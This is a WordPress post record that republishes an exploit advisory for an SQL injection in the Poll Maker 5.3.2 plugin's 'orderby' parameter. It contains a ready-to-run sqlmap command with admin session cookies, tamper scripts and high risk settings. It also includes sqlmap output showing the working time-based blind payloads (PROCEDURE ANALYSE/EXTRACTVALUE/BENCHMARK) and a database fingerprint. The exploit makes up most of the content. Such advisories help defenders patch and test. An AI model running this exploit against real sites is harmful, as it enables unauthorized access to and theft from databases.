{"id":58138,"date":"2024-07-11T18:10:14","date_gmt":"2024-07-11T15:10:14","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179500\/wppollmaker532-sql.txt"},"modified":"2024-07-11T18:10:14","modified_gmt":"2024-07-11T15:10:14","slug":"wordpress-poll-maker-5-3-2-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-poll-maker-5-3-2-sql-injection\/","title":{"rendered":"WordPress Poll Maker 5.3.2 SQL Injection"},"content":{"rendered":"<p># Exploit Title: WordPress Poll Maker Plugin SQL Injection <br \/># Date: 2024-07-11<br \/># Exploit Author: tmrswrr<br \/># Category : Webapps<br \/># Vendor: https:\/\/ays-pro.com\/wordpress\/poll-maker<br \/># Version 5.3.2<\/p>\n<p>1. **Access the Admin Panel:**<br \/>&#8211; Navigate to the admin panel of your WordPress site.<br \/>&#8211; Go to `Poll Maker &gt; `Results` &gt; https:\/\/localhost\/wordpress\/wp-admin\/admin.php?page=poll-maker-ays-results&amp;orderby=id&amp;order=desc<br \/>&#8220;`<br \/>3. Search for orderby parameter.<\/p>\n<p>## SQLMAP COMMAND<\/p>\n<p>python3 sqlmap.py -u &#8220;https:\/\/localhost\/wordpress\/wp-admin\/admin.php?page=poll-maker-ays-results&amp;orderby=id&amp;order=desc&#8221; &#8211;cookie=&#8221;wordpress_logged_in_55e28812cb0bc43705127d62a25df794=admin|1720624086|cQgkhpgoy0ZxhQSupSHRw7bo9mxcwEWyUp0VreNnZBK|d74e12a1cdecafc50c920c18d4711826598780dd360f3a637abcc68a6086f7a3; _wp_travel_engine_session=010869411d3c5e302ccf674d9a49d453||1720689253||1720688893; wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|81237d448295de9d99b8560e6b6d9d8640f81c4dbb629e550e56860775baf0b3; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|d8d2e1da10a83ab054e39b8dfa5787c0dc2d586f364bcb584983b26efb857285; wordpress_test_cookie=WP Cookie check; wp-settings-1=editor=html; wp-settings-time-1=1720687513&#8243; &#8211;batch &#8211;dbms=mysql &#8211;threads=10 &#8211;no-cast &#8211;random-agent -v 3 &#8211;tamper=&#8221;between,randomcase,space2comment&#8221; &#8211;level=5 &#8211;risk=3 <\/p>\n<p>## RESULT<\/p>\n<p>Parameter: orderby (GET)<br \/>Type: time-based blind<br \/>Title: MySQL &gt;= 5.1 time-based blind (heavy query) &#8211; PROCEDURE ANALYSE (EXTRACTVALUE)<br \/>Payload: page=poll-maker-ays-results&amp;orderby=id PROCEDURE ANALYSE(EXTRACTVALUE(3054,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x58655778))))),1)# wcUc&amp;order=desc<br \/>Vector: PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT(&#8216;\\&#8217;,(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5(&#8216;[RANDSTR]&#8217;)),[RANDNUM])))),1)<br \/>&#8212;<\/p>\n<p>&#8212;<br \/>[08:03:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)<br \/>[08:03:59] [INFO] the back-end DBMS is MySQL<br \/>[08:03:59] [PAYLOAD] id\/**\/PrOCEdUrE\/**\/analySE(exTRActvALuE(6707,CoNcAT(0x5c,(iF((VeRSION()\/**\/LikE\/**\/0x254d61726961444225),BenChmaRk(5000000,MD5(0x6e454541)),6707)))),1)#\/**\/ZrRh<br \/>[08:03:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions <br \/>do you want sqlmap to try to optimize value(s) for DBMS delay responses (option &#8216;&#8211;time-sec&#8217;)? [Y\/n] Y<br \/>[08:04:01] [DEBUG] used the default behavior, running in batch mode<br \/>web application technology: Apache 2.4.54, PHP 8.0.23<br \/>back-end DBMS: MySQL &gt;= 5.0.12 (MariaDB fork)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WordPress Poll Maker Plugin SQL Injection # Date: 2024-07-11# Exploit Author: tmrswrr# Category : Webapps# Vendor: https:\/\/ays-pro.com\/wordpress\/poll-maker# Version 5.3.2 1. **Access the Admin Panel:**&#8211; Navigate to the admin panel of your WordPress site.&#8211; Go to `Poll Maker &gt; `Results` &gt; https:\/\/localhost\/wordpress\/wp-admin\/admin.php?page=poll-maker-ays-results&amp;orderby=id&amp;order=desc&#8220;`3. Search for orderby parameter. ## SQLMAP COMMAND python3 sqlmap.py -u &#8220;https:\/\/localhost\/wordpress\/wp-admin\/admin.php?page=poll-maker-ays-results&amp;orderby=id&amp;order=desc&#8221; &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58138","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58138","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58138"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58138\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58138"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58138"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58138"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}